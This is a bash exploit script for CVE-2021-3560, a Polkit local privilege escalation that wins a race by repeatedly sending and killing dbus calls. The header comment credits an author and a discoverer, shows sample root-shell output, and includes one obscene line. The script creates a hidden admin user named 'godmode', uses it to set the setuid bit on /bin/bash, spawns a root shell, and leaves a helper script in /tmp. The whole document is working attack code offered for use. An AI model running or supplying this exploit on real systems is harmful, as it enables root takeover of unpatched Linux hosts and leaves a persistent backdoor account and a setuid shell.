#!/bin/bash

# Exploit by: Marshall Whittaker / oxagast
# oxagast@oxasploits.com
# Discovery by: Kevin Backhouse
# Polkit 0.113 - 0.118 LPE via Race Condition
# CVE-2021-3560
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
# Note: you will manually need to remove the godmode user
# as well as chmod a-s /bin/bash and rm /tmp/oneup.sh afterwards.
# My neck, my back lick it lick my pussy and my crack.
#
# [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh 
# Password: 
# [sudo] password for godmode: bash-5.1# 
# bash-5.1# id; whoami;uname -a;
# uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall)
# root
# Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux
# bash-5.1# 

function sploit {
  for wait in {1..5}; do
  P=$(openssl passwd -5 a);
  W=$(printf "0.00"$wait"s")
  for race in {0..25}; do
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 2>/dev/null & sleep $W ; kill $! 2>/dev/null
    ID=$(cat /etc/passwd | grep godmode | cut -d ':' -f 3 | tr -d '\n');
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god 2>/dev/null & sleep $W ; kill $! 2>/dev/null
  done;
  sleep 0.5;
  echo 'echo a | sudo -S chmod a+s /bin/bash' > /tmp/oneup.sh;
  chmod a+x /tmp/oneup.sh;
  (sleep 1; echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty && spawn
done
}

function spawn {
  if [ -u /bin/bash ]; then
    printf "\r\t\t\t"
    /bin/bash -p;
    /bin/bash -p ./mortalize.sh
    kill $?
  fi;
}

sploit;